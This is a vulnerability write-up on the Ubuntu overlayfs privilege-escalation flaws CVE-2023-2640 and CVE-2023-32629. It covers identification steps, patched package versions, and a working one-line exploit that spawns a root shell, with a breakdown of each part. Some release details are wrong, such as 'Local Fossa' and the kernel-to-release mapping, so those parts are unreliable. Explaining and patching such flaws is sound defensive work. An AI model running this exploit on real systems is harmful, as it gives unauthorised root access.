Ubuntu could allow a local authenticated attacker to gain elevated privileges on the system, caused by skipping permission checking for trusted.overlayfs.* xattrs”. By sending a specially crafted request, an attacker could exploit this vulnerability to escalate privileges.
CVE-2023-2640
https://www.cvedetails.com/cve/CVE-2023-2640/
- On Ubuntu kernels carrying both c914c0e27eb0 and “UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs”, an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.
CVE-2023-32629
https://www.cvedetails.com/cve/CVE-2023-32629/
- Local privilege escalation vulnerability in Ubuntu Kernels overlayfs ovl_copy_up_meta_inode_data skip permission checks when calling ovl_do_setxattr on Ubuntu kernels.
Vulnerable kernels
6.2.0 Ubuntu 23.04 (Lunar Lobster) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.19.0 Ubuntu 22.10 (Kinetic Kudu) / Ubuntu 22.04 LTS (Jammy Jellyfish)
5.4.0 Ubuntu 22.04 LTS (Local Fossa) / Ubuntu 18.04 LTS (Bionic Beaver)
Identification
1. Verify the OS version
- lsb_release -a
2. Verify the kernel version
- uname -r
- uname -a
- cat /proc/version
Exploitation
1. Knowing this is a vulnerable version of Ubuntu (6.2.0), we can proceed to run the following command to become root
- unshare -rm sh -c “mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;” && u/python3 -c ‘import os;import pty;os.setuid(0);pty.spawn(“/bin/bash”)’
2. After running this command you should become root
Breakdown
- unshare -rm sh -c: This command creates a new namespace (-m), and then runs a shell (sh) in this new namespace. The -r option makes the process run in a separate user namespace.
- “mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;”: This is the command that is executed in the new namespace. It does the following:
- mkdir l u w m: Creates four directories – l, u, w, and m.
- cp /u*/b*/p*3 l/: Copies files matching the pattern /u*/b*/p*3 to the directory l/.
- setcap cap_setuid+eip l/python3: Sets the cap_setuid capability and eip flag on the python3 binary in the l/ directory.
- mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m: Mounts an overlay filesystem using the directories l, u, and w. The overlay filesystem allows combining multiple directories into one.
- touch m/*: Creates empty files in the m/ directory.
- &&: This is a logical AND operator, which means the next command will be executed only if the previous one succeeds.
- u/python3 -c ‘import os; import pty; os.setuid(0); pty.spawn(“/bin/bash”)’: This command is executed if the previous part is successful. It uses the python3 interpreter located in the directory u/ to execute a Python script. The Python script imports the os and pty modules, sets the user ID to 0 (root), and spawns a new interactive bash shell using pty.spawn(“/bin/bash”).
Remedy
The problem can be corrected by updating your system to the following package versions:
- linux-image-6.2.0-1010-gcp – 6.2.0-1010.10
- linux-image-aws – 6.2.0.1008.9
- linux-image-6.2.0-26-generic-64k – 6.2.0-26.26
- linux-image-virtual – 6.2.0.26.26
- linux-image-6.2.0-1008-azure – 6.2.0-1008.8
- linux-image-generic-64k – 6.2.0.26.26
- linux-image-generic – 6.2.0.26.26
- linux-image-6.2.0-1008-oracle – 6.2.0-1008.8
- linux-image-raspi – 6.2.0.1009.12
- linux-image-6.2.0-1009-lowlatency – 6.2.0-1009.9
- linux-image-ibm – 6.2.0.1006.6
- linux-image-6.2.0-26-generic – 6.2.0-26.26
- linux-image-azure – 6.2.0.1008.8
- linux-image-raspi-nolpae – 6.2.0.1009.12
- linux-image-6.2.0-26-generic-lpae – 6.2.0-26.26
- linux-image-kvm – 6.2.0.1009.9
- linux-image-6.2.0-1009-lowlatency-64k – 6.2.0-1009.9
- linux-image-gcp – 6.2.0.1010.10
- linux-image-lowlatency-64k – 6.2.0.1009.9
- linux-image-oracle – 6.2.0.1008.8
- linux-image-6.2.0-1009-kvm – 6.2.0-1009.9
- linux-image-6.2.0-1009-raspi – 6.2.0-1009.11
- linux-image-6.2.0-1006-ibm – 6.2.0-1006.6
- linux-image-generic-lpae – 6.2.0.26.26
- linux-image-6.2.0-1008-aws – 6.2.0-1008.8
- linux-image-lowlatency – 6.2.0.1009.9
Sources
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
https://www.cvedetails.com/cve/CVE-2023-2640/
https://www.cvedetails.com/cve/CVE-2023-32629/
https://github.com/ThrynSec/CVE-2023-32629-CVE-2023-2640—POC-Escalation